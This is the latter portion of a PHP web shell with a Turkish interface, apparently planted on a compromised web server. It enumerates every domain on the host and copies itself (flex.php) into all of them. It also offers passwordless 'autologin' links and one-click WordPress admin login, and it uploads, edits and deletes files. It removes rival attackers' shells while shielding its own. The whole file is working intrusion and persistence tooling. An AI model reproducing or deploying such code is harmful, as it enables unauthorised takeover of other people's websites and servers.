overflow:hidden; } .delete-title { color:#e84118; font-weight:bold; padding:12px 15px; cursor:pointer; display:flex; justify-content:space-between; align-items:center; user-select:none; } .delete-title:hover { background:rgba(232,65,24,0.15); } .delete-title .toggle-arrow { font-size:11px; transition:transform 0.25s; display:inline-block; } .delete-title.collapsed .toggle-arrow { transform:rotate(-90deg); } .delete-body { padding:0 15px 15px; } .delete-body.collapsed { display:none; } .pre-box { background:#1e272e; padding:15px; border-radius:5px; color:#0f0; font-family:monospace; white-space:pre-wrap; max-height:500px; overflow:auto; border:1px solid #40739e; } .stats { background:#353b48; padding:10px; border-radius:5px; margin:10px 0; display:flex; gap:20px; flex-wrap:wrap; } .stat-item { flex:1; text-align:center; min-width:100px; } .stat-value { font-size:24px; font-weight:bold; color:#00a8ff; } .stat-label { font-size:12px; color:#888; } .editor-wrap textarea { width:100%; height:600px; background:#1e272e; color:#0f0; border:1px solid #40739e; border-radius:5px; padding:12px; font-family:'Courier New',monospace; font-size:13px; line-height:1.6; resize:vertical; outline:none; display:block; } .editor-wrap textarea:focus { border-color:#00a8ff; box-shadow:0 0 0 2px rgba(0,168,255,0.25); } </style> <script> function toggleAll(s){document.querySelectorAll("input[name='bulk_delete[]']").forEach(cb=>cb.checked=s.checked);} function toggleMalicious(s){document.querySelectorAll("input[name='selected[]']").forEach(cb=>cb.checked=s.checked);} function showRenameModal(path,name){document.getElementById('rename_old').value=path;document.getElementById('rename_new').value=name;document.getElementById('renameModal').classList.add('active');} function hideRenameModal(){document.getElementById('renameModal').classList.remove('active');} function showDomainModal(){document.getElementById('domainModal').classList.add('active');} function hideDomainModal(){document.getElementById('domainModal').classList.remove('active');} function showMaliciousModal(){document.getElementById('maliciousModal').classList.add('active');} function hideMaliciousModal(){document.getElementById('maliciousModal').classList.remove('active');} function goToDomain(path){window.location.href='?dir='+encodeURIComponent(path);} function openDomainUrl(url){window.open(url,'_blank');} function downloadFile(path){window.location.href='?download='+encodeURIComponent(path);} function analyzeFile(path){var form=document.createElement('form');form.method='post';form.innerHTML='<input name="action" value="analyze"><input name="file" value="'+path.replace(/"/g,'"')+'">';document.body.appendChild(form);form.submit();} function editFile(path){window.location.href='?editf='+btoa(unescape(encodeURIComponent(path)))+'&dir=<?php echo urlencode($current_dir); ?>';} function deployShell(){if(confirm('Tum domainlere shell kopyalansin mi? (flex.php)')){window.location.href='?deploy=run';}} function wpAdminLogin(path,url){ window.location.href='?wpadmin_deploy=1&wpdir='+encodeURIComponent(path)+'&wpurl='+encodeURIComponent(url); } document.addEventListener('keydown',function(e){ if(e.altKey&&!e.ctrlKey&&(e.key==='w'\|\|e.key==='W')&&!e.target.matches('input[type="text"],input[type="password"],input[type="search"],textarea,select')){ var checked=document.querySelectorAll("input[name='bulk_delete[]']:checked:not(:disabled)"); if(!checked.length)return; e.preventDefault(); var cont=document.getElementById('twf_inputs'); cont.innerHTML=''; checked.forEach(function(cb){var h=document.createElement('input');h.type='hidden';h.name='paths[]';h.value=cb.value;cont.appendChild(h);}); document.getElementById('toggle_write_form').submit(); } }); function showAutologinUrl(){ var token='<?php echo hash("sha256",$stored_username.":script_iletisim:autologin_key"); ?>'; var base=window.location.protocol+'//'+window.location.host+window.location.pathname; var url=base+'?autologin='+token; var el=document.getElementById('autologin-url-box'); el.style.display=el.style.display==='none'?'block':'none'; document.getElementById('autologin-url-input').value=url; } function toggleSection(titleEl){ titleEl.classList.toggle('collapsed'); var body=titleEl.nextElementSibling; body.classList.toggle('collapsed'); } function copyAutologinUrl(){ var inp=document.getElementById('autologin-url-input'); inp.select();inp.setSelectionRange(0,99999);document.execCommand('copy');alert('Otologin URL kopyalandi!'); } </script> </head> <body> <div class="container"> <div style="background:#353b48; padding:5px; margin-bottom:10px; text-align:center; color:#00a8ff; font-weight:bold;"> 🔥 GELİŞMİŞ SHELL - KORUMALI \| Sadece izinli dosyalar: <?php echo implode(', ', $allowed_shells); ?> </div> <h2>📁 <?php echo htmlspecialchars($current_dir); ?></h2> <div class="toolbar"> <a href="?logout=1" class="button">Çıkış</a> <?php if (dirname($current_dir) != $current_dir): ?> <a class="button" href="?dir=<?php echo urlencode(dirname($current_dir)); ?>">⬆ Üst Dizin</a> <?php endif; ?> <button class="success" onclick="showDomainModal()">🌐 Domainler (<?php echo count($all_domains); ?>)</button> <button class="warning" onclick="deployShell()">📋 SHELL KOPYALA (flex.php)</button> <form method="post" style="display:inline;"> <input type="hidden" name="action" value="scan"> <button type="submit" class="danger">🔍 ZARARLI SHELL TARA</button> </form> <?php if (!empty($malicious_files)): ?> <button class="danger" onclick="showMaliciousModal()">⚠️ ZARARLI SHELL'LER (<?php echo count($malicious_files); ?>)</button> <?php endif; ?> <?php if (file_exists($current_dir . '/wp-load.php')): ?> <button style="background:#8e44ad;" onclick="wpAdminLogin('<?php echo addslashes($current_dir); ?>', '<?php echo (isset($_SERVER['HTTPS']) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST']; ?>')">🛡️ WP Admin Giriş</button> <?php endif; ?> <button class="info" onclick="showAutologinUrl()">🔑 Otologin URL</button> <span style="margin-left:auto; color:#00a8ff;">Korunan: <?php echo count($our_shells) + count($wordpress_core_files) + count($protected_files); ?> dosya</span> </div> <div id="autologin-url-box" style="display:none; background:#1e272e; border:1px solid #00a8ff; border-radius:5px; padding:10px; margin-bottom:10px; display:none;"> <div style="margin-bottom:6px; color:#00a8ff; font-size:13px;">🔑 Otologin URL — Bu linki paylaşın, giriş gerekmeden erişim sağlanır:</div> <div style="display:flex; gap:8px; align-items:center;"> <input id="autologin-url-input" type="text" readonly style="flex:1; background:#2f3640; color:#fff; border:1px solid #40739e; border-radius:4px; padding:6px 10px; font-size:12px; font-family:monospace;" value=""> <button class="success" onclick="copyAutologinUrl()" style="white-space:nowrap;">📋 Kopyala</button> </div> </div> <div id="domainModal" class="modal"> <div class="modal-content"> <h3>🌐 Sunucudaki Domainler (Tam URL)</h3> <div class="domain-stats"> <div class="domain-stat-box"><div class="stat-value"><?php echo count($all_domains); ?></div><div class="stat-label">Toplam Domain</div></div> <div class="domain-stat-box"><div class="stat-value"><?php echo count(array_filter($all_domains, function($d) { return strpos($d['url'], 'https') === 0; })); ?></div><div class="stat-label">HTTPS</div></div> <div class="domain-stat-box"><div class="stat-value"><?php echo count(array_filter($all_domains, function($d) { return strpos($d['url'], 'http:') === 0; })); ?></div><div class="stat-label">HTTP</div></div> </div> <div class="domain-list"> <?php if (empty($all_domains)): ?> <p style="padding:10px;">Domain bulunamadı.</p> <?php else: ?> <?php foreach ($all_domains as $d): ?> <div class="domain-item"> <div style="flex:2;" onclick="goToDomain('<?php echo htmlspecialchars($d['path']); ?>')"> <span class="domain-url"> <?php if (strpos($d['url'], 'https') === 0): ?>🔒 <?php else: ?>🔓 <?php endif; ?> <?php echo htmlspecialchars($d['url']); ?> <span class="domain-badge <?php echo (strpos($d['url'], 'https') === 0) ? 'protocol-https' : 'protocol-http'; ?>"><?php echo (strpos($d['url'], 'https') === 0) ? 'HTTPS' : 'HTTP'; ?></span> </span> <div class="domain-path">📁 <?php echo htmlspecialchars($d['path']); ?> [<?php echo $d['type']; ?>]</div> </div> <div style="display:flex; gap:5px;"> <button class="button info" onclick="event.stopPropagation(); openDomainUrl('<?php echo htmlspecialchars($d['url']); ?>')" style="padding:4px 8px; font-size:11px;">🌐 Siteyi Aç</button> <button class="button" onclick="event.stopPropagation(); goToDomain('<?php echo htmlspecialchars($d['path']); ?>')" style="padding:4px 8px; font-size:11px;">📂 Dizine Git</button> <?php if (file_exists($d['path'] . '/wp-load.php')): ?> <button style="background:#8e44ad; color:#fff; border:none; padding:4px 8px; border-radius:5px; cursor:pointer; font-size:11px;" onclick="event.stopPropagation(); wpAdminLogin('<?php echo addslashes($d['path']); ?>', '<?php echo addslashes($d['url']); ?>')">🛡️ WP Admin</button> <?php endif; ?> </div> </div> <?php endforeach; ?> <?php endif; ?> </div> <div style="margin-top:15px; text-align:right;"><button onclick="hideDomainModal()">Kapat</button></div> </div> </div> <?php if (!empty($malicious_files)): ?> <div id="maliciousModal" class="modal"> <div class="modal-content"> <h3>⚠️ ZARARLI SHELL DOSYALARI</h3> <p>Toplam: <?php echo count($malicious_files); ?> zararlı dosya bulundu.</p> <form method="post"> <input type="hidden" name="action" value="delete_selected"> <table style="width:100%;"> <tr><th width="30"><input type="checkbox" onclick="toggleMalicious(this)"></th><th>Dosya</th><th>Risk</th><th width="350">İşlemler</th></tr> <?php foreach ($malicious_files as $m): ?> <tr> <td><input type="checkbox" name="selected[]" value="<?php echo htmlspecialchars($m['path']); ?>"></td> <td><strong><?php echo htmlspecialchars($m['name']); ?></strong><br><small><?php echo htmlspecialchars(substr(dirname($m['path']), 0, 50)); ?><br>Boyut: <?php echo $m['size']; ?> bytes</small></td> <td><span class="<?php echo ($m['risk'] > 70) ? 'risk-high' : (($m['risk'] > 40) ? 'risk-medium' : 'risk-low'); ?>"><?php echo $m['risk']; ?></span></td> <td><div class="button-group"><button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($m['path']); ?>')">📥 İndir</button><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($m['path']); ?>', '<?php echo addslashes($m['name']); ?>')">✏️ Adlandır</button><button type="button" class="analyze-btn" onclick="analyzeFile('<?php echo addslashes($m['path']); ?>')">🔍 Analiz</button><button type="button" class="edit-btn" onclick="editFile('<?php echo addslashes($m['path']); ?>')">✏️ Düzenle</button></div></td> </tr> <?php endforeach; ?> </table> <div style="margin-top:15px; display:flex; gap:10px; justify-content:space-between;"><div><button type="submit" class="danger">🗑 SEÇİLİ ZARARLILARI SİL</button></div><div><button type="button" class="button" onclick="hideMaliciousModal()">Kapat</button></div></div> </form> </div> </div> <?php endif; ?> <form method="post" enctype="multipart/form-data" style="margin:10px 0;"> <input type="file" name="files[]" multiple> <input type="hidden" name="action" value="upload"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>"> <button type="submit" class="success">📤 Yükle</button> </form> <form id="toggle_write_form" method="post" style="display:none;"> <input type="hidden" name="action" value="toggle_write"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>"> <div id="twf_inputs"></div> </form> <hr> <?php if (!empty($plugins['suspicious'])): ?> <div class="delete-section"> <div class="delete-title collapsed" onclick="toggleSection(this)">⚠️ ŞÜPHELİ EKLENTİLER (<?php echo count($plugins['suspicious']); ?>) - SİLİNEBİLİR <span class="toggle-arrow">▼</span></div> <div class="delete-body collapsed"> <?php foreach ($plugins['suspicious'] as $plugin): ?> <div class="row plugin-suspicious"> <div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($plugin['path']); ?>"></div> <div>📦 <?php echo htmlspecialchars($plugin['name']); ?><?php if ($plugin['active']): ?><span class="active-badge">AKTİF</span><?php else: ?><span class="inactive-badge">PASİF</span><?php endif; ?><span class="plugin-suspicious-badge">ŞÜPHELİ</span></div> <div class="inline-controls"><button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($plugin['path']); ?>')">📥 İndir</button><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($plugin['path']); ?>', '<?php echo addslashes($plugin['name']); ?>')">✏️ Adlandır</button><button type="button" class="edit-btn" onclick="editFile('<?php echo addslashes($plugin['path']); ?>')">✏️ Düzenle</button><button type="button" class="delete-btn" onclick="if(confirm('Bu eklentiyi silmek istediğinize emin misiniz?')) { document.getElementById('delete_form_<?php echo md5($plugin['path']); ?>').submit(); }">🗑 Sil</button><a href="?dir=<?php echo urlencode($plugin['path']); ?>" class="button">🔍 İncele</a></div> </div> <form id="delete_form_<?php echo md5($plugin['path']); ?>" method="post" style="display:none;"><input type="hidden" name="action" value="bulk_delete"><input type="hidden" name="bulk_delete[]" value="<?php echo htmlspecialchars($plugin['path']); ?>"></form> <?php endforeach; ?> </div> </div> <?php endif; ?> <?php if (!empty($themes['inactive'])): ?> <div class="delete-section"> <div class="delete-title collapsed" onclick="toggleSection(this)">💤 PASİF TEMALAR (<?php echo count($themes['inactive']); ?>) - SİLİNEBİLİR <span class="toggle-arrow">▼</span></div> <div class="delete-body collapsed"> <?php foreach ($themes['inactive'] as $theme): ?> <div class="row theme-inactive"> <div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($theme['path']); ?>"></div> <div>🎨 <?php echo htmlspecialchars($theme['name']); ?><span class="inactive-badge">PASİF</span></div> <div class="inline-controls"><button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($theme['path']); ?>')">📥 İndir</button><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($theme['path']); ?>', '<?php echo addslashes($theme['name']); ?>')">✏️ Adlandır</button><button type="button" class="edit-btn" onclick="editFile('<?php echo addslashes($theme['path']); ?>')">✏️ Düzenle</button><button type="button" class="delete-btn" onclick="if(confirm('Bu temayı silmek istediğinize emin misiniz?')) { document.getElementById('delete_theme_<?php echo md5($theme['path']); ?>').submit(); }">🗑 Sil</button><a href="?dir=<?php echo urlencode($theme['path']); ?>" class="button">🔍 İncele</a></div> </div> <form id="delete_theme_<?php echo md5($theme['path']); ?>" method="post" style="display:none;"><input type="hidden" name="action" value="bulk_delete"><input type="hidden" name="bulk_delete[]" value="<?php echo htmlspecialchars($theme['path']); ?>"></form> <?php endforeach; ?> </div> </div> <?php endif; ?> <form method="post" onsubmit="return confirm('Seçili dosya/klasörleri silmek istediğinize emin misiniz?');"> <input type="hidden" name="action" value="bulk_delete"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>"> <div class="list-header"> <div class="select-all"><input type="checkbox" onclick="toggleAll(this)"> <strong>Tümünü Seç</strong> <span style="color:#888; font-size:12px; margin-left:10px;">(Korunan dosyalar seçilemez ve silinemez)</span></div> <button type="submit" class="button danger">Seçileni Sil</button> </div> <h3>📁 Klasörler</h3> <?php foreach ($folders as $folder): $path = $current_dir . '/' . $folder; $perm = substr(sprintf('%o', fileperms($path)), -3); $id = 'chmod_' . md5($path); $is_wp_dir = in_array($folder, $wordpress_core_dirs); $is_our_shell = in_array($folder, $our_shells); $is_protected = $is_wp_dir \|\| $is_our_shell; ?> <div class="row <?php if ($is_protected) echo 'protected'; ?>"> <div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($path); ?>" <?php if ($is_protected) echo 'disabled'; ?>></div> <div class="name">📁 <a href="?dir=<?php echo urlencode($path); ?>"><?php echo htmlspecialchars($folder); ?></a><?php if ($is_wp_dir): ?><span class="wp-badge">WORDPRESS</span><?php endif; ?><?php if ($is_our_shell): ?><span class="our-badge">SHELL</span><?php endif; ?><?php if (!$is_protected): ?><?php if ((int)$perm[0] & 2): ?><span class="perm-open">🔓 YAZMA AÇIK</span><?php else: ?><span class="perm-closed">🔒 YAZMA KAPALI</span><?php endif; ?><?php endif; ?></div> <div class="inline-controls"><button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($path); ?>')">📥 İndir</button><?php if (!$is_protected): ?><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($path); ?>', '<?php echo addslashes($folder); ?>')">✏️ Adlandır</button><?php endif; ?></div> </div> <?php endforeach; ?> <h3>📄 Dosyalar</h3> <?php foreach ($files as $file): $path = $current_dir . '/' . $file; $perm = substr(sprintf('%o', fileperms($path)), -3); $id = 'chmod_' . md5('f_'.$path); $editUrl = '?editf=' . base64_encode($path) . '&dir=' . urlencode($current_dir); $is_protected = false; $protected_type = ''; if (in_array($file, $protected_files)) { $is_protected = true; $protected_type = 'KORUNAN'; } elseif (in_array($file, $wordpress_core_files)) { $is_protected = true; $protected_type = 'WORDPRESS'; } elseif (in_array($file, $our_shells)) { $is_protected = true; $protected_type = 'SHELL'; } $is_malicious = false; $malicious_risk = 0; if (!$is_protected && isset($_SESSION['malicious'])) { foreach ($_SESSION['malicious'] as $m) { if ($m['path'] == $path) { $is_malicious = true; $malicious_risk = $m['risk']; break; } } } $row_class = $is_protected ? 'protected' : ($is_malicious ? 'malicious' : ''); ?> <div class="row <?php echo $row_class; ?>"> <div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($path); ?>" <?php if ($is_protected) echo 'disabled'; ?>></div> <div class="name">📄 <?php echo htmlspecialchars($file); ?><?php if ($protected_type): ?><span class="<?php echo ($protected_type == 'WORDPRESS') ? 'wp-badge' : (($protected_type == 'SHELL') ? 'our-badge' : 'protected-badge'); ?>"><?php echo $protected_type; ?></span><?php endif; ?><?php if ($is_malicious): ?><span class="malicious-badge">ZARARLI (<?php echo $malicious_risk; ?>)</span><?php endif; ?><?php if (!$is_protected): ?><?php if ((int)$perm[0] & 2): ?><span class="perm-open">🔓 YAZMA AÇIK</span><?php else: ?><span class="perm-closed">🔒 YAZMA KAPALI</span><?php endif; ?><?php endif; ?></div> <div class="inline-controls"> <button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($path); ?>')">📥 İndir</button> <?php if (!$is_protected): ?><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($path); ?>', '<?php echo addslashes($file); ?>')">✏️ Adlandır</button><?php endif; ?> <a class="button" href="<?php echo $editUrl; ?>" onclick="<?php if ($is_protected) echo 'return confirm(\'Bu dosya KORUNAN bir dosyadır. Düzenlemek sitenin çalışmasını bozabilir. Devam etmek istediğinize emin misiniz?\');'; ?>">Düzenle</a> </div> </div> <?php endforeach; ?> <div class="list-header"><div></div><button type="submit" class="button danger">Seçileni Sil</button></div> </form> <div id="renameModal" class="modal"> <div class="modal-content"> <h3>📝 Dosya/Klasör Adını Değiştir</h3> <form method="post"> <input type="hidden" name="action" value="rename"> <input type="hidden" name="old" id="rename_old"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>"> <p style="margin-bottom:10px;">Yeni isim:</p> <input type="text" name="new" id="rename_new" required style="width:100%; padding:8px; margin-bottom:15px; background:#1e272e; color:#fff; border:1px solid #40739e; border-radius:5px;"> <div style="text-align:right; display:flex; gap:10px; justify-content:flex-end;"><button type="button" class="button" onclick="hideRenameModal()">İptal</button><button type="submit" class="success">Değiştir</button></div> </form> </div> </div> <?php $file_to_edit = null; if (isset($_GET['editf'])) { $file_to_edit = base64_decode($_GET['editf']); } elseif (isset($_GET['edit'])) { $file_to_edit = $_GET['edit']; } if ($file_to_edit && file_exists($file_to_edit)): $is_protected = in_array(basename($file_to_edit), $protected_files) \|\| in_array(basename($file_to_edit), $wordpress_core_files) \|\| in_array(basename($file_to_edit), $our_shells); ?> <hr> <h3>✍️ Dosyayı Düzenle: <?php echo htmlspecialchars(basename($file_to_edit)); ?></h3> <?php if ($is_protected): ?><div style="background:#e84118; padding:10px; border-radius:5px; margin-bottom:10px; color:#fff; font-weight:bold;">⚠️ UYARI: Bu dosya KORUNAN bir dosyadır. Düzenlemek sitenin çalışmasını bozabilir!</div><?php endif; ?> <div class="editor-wrap"> <form method="post"> <textarea name="content"><?php echo htmlspecialchars(file_get_contents($file_to_edit)); ?></textarea> <input type="hidden" name="action" value="edit"> <input type="hidden" name="file" value="<?php echo htmlspecialchars($file_to_edit); ?>"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($_GET['dir'] ?? $current_dir); ?>"> <div class="toolbar" style="margin-top:10px"><button class="button" type="submit">Kaydet</button><a class="button" href="?dir=<?php echo urlencode($_GET['dir'] ?? $current_dir); ?>">İptal</a></div> </form> </div> <?php endif; ?> <?php if (!empty($analysis)): ?> <hr> <h3>🔍 Dosya Analizi: <?php echo htmlspecialchars(basename($analysis_file)); ?></h3> <div class="pre-box"><?php echo nl2br(htmlspecialchars($analysis)); ?></div> <?php endif; ?> <div class="stats"> <div class="stat-item"><div class="stat-value"><?php echo count($files); ?></div><div class="stat-label">Dosya</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($folders); ?></div><div class="stat-label">Klasör</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($malicious_files); ?></div><div class="stat-label">Zararlı</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($our_shells); ?></div><div class="stat-label">Bizim Shell</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($wordpress_core_files); ?></div><div class="stat-label">WP Core</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($protected_files); ?></div><div class="stat-label">Özel Koruma</div></div> </div> <div style="text-align:center; margin-top:20px; color:#888; font-size:12px;"> 🔒 Gelişmiş Shell - Sadece izinli dosyalar çalışır: <?php echo implode(', ', $allowed_shells); ?> </div> </div> </body> </html>

| ver. 1.1 | | . | PHP 8.4.20 | Ð“ÐµÐ½ÐµÑ€Ð°Ñ†Ð¸Ñ ÑÑ‚Ñ€Ð°Ð½Ð¸Ñ†Ñ‹: 0 | proxy | phpinfo | ÐÐ°ÑÑ‚Ñ€Ð¾Ð¹ÐºÐ°